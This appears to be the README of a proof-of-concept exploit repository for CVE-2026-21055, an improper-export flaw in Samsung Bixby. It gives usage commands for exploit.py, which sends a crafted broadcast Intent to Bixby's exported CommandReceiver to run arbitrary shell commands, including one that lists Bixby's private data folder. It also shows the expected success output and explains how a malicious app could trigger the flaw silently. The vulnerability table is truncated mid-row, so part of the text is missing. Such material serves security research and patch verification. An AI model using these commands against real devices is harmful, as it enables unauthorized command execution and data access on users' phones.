Share
## https://sploitus.com/exploit?id=43160B22-2542-50BC-A392-D3C8B8C0E751
# CVE-2026-21055 PoC โ€” Samsung Bixby Improper Component Export

Proof of Concept for **CVE-2026-21055**: Improper export of Android application components in Samsung Bixby prior to version 4.0.70.8 allows local attackers to execute arbitrary commands with Bixby privilege.

## Overview

This repository contains two Python scripts:

1. **`analyze_components.py`** โ€” Parses a decompiled AndroidManifest.xml to enumerate exported activities, services, receivers, and providers. Flags components exported without permission guards.

2. **`exploit.py`** โ€” Demonstrates the Intent-based attack by sending a crafted broadcast Intent to Bixby's exported command receiver via `adb shell am`, executing a command with Bixby's system-level privileges.

## Vulnerability Details

| Field | Value |
|---|---|
| **CVE ID** | CVE-2026-21055 |
| **Samsung SVE** | SVE-2026-0917 |
| **CVSS v4.0** | 8.5 โ€” High |
| **CWE** | CWE-926 โ€” Improper Export of Android Application Components |
| **Affected App** | Samsung Bixby (`com.samsung.android.bixby.agent`) |
| **Affected Versions** |  bixby.apk

# Decompile with apktool
$ apktool d bixby.apk -o bixby_decompiled -f
```

Run the analysis script:

```bash
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml
```

Or let the script decompile automatically:

```bash
$ python3 analyze_components.py --apk bixby.apk
```

### 2. List Exported Components on a Live Device

```bash
$ python3 exploit.py --list
```

### 3. Run the Exploit

```bash
# Default: execute 'id' command
$ python3 exploit.py

# Custom command
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"

# Specify a custom component (if auto-detection fails)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver
```

### Expected Output

```
============================================================
  CVE-2026-21055 PoC โ€” Samsung Bixby Command Execution
  Improper Export of Android Application Components
============================================================

[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version:  4.0.69.2
[*] Vulnerable:     YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx

[*] Executing exploit...
[*] Crafting exploit Intent...
    Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
    Action:    com.samsung.android.bixby.agent.ACTION_RUN_SHELL
    Command:   id
    Output:    /data/local/tmp/bixby_poc_output

[+] Intent sent.

[+] Command output (executed with Bixby privilege):
    uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)

[+] EXPLOIT SUCCESSFUL โ€” command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx
```

## How It Works

1. **Component Export**: Bixby exports one or more components (services/receivers) that handle command execution or automation triggers. These components are exported with `android:exported="true"` but without a `android:permission` attribute or runtime permission checks.

2. **Intent Delivery**: Any app on the device can send an Intent to these exported components. The Intent carries an action string (e.g., `ACTION_RUN_SHELL`) and string extras containing the command to execute and an output file path.

3. **Command Execution**: Bixby's exported component receives the Intent, extracts the command, and executes it via `Runtime.exec()` or a similar mechanism. The command runs in Bixby's process context, inheriting all of Bixby's system-level permissions.

4. **No User Interaction**: The exploit requires no user interaction. The malicious app sends the Intent silently in the background.

## Disclaimer

This PoC is provided for educational and security research purposes only. Only test on devices you own or have explicit authorization to test. Do not use this exploit against devices without the owner's consent.

## Sources

- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-21055
- Samsung Mobile Security Bulletin (July 2026): https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=07
- CWE-926: https://cwe.mitre.org/data/definitions/926.html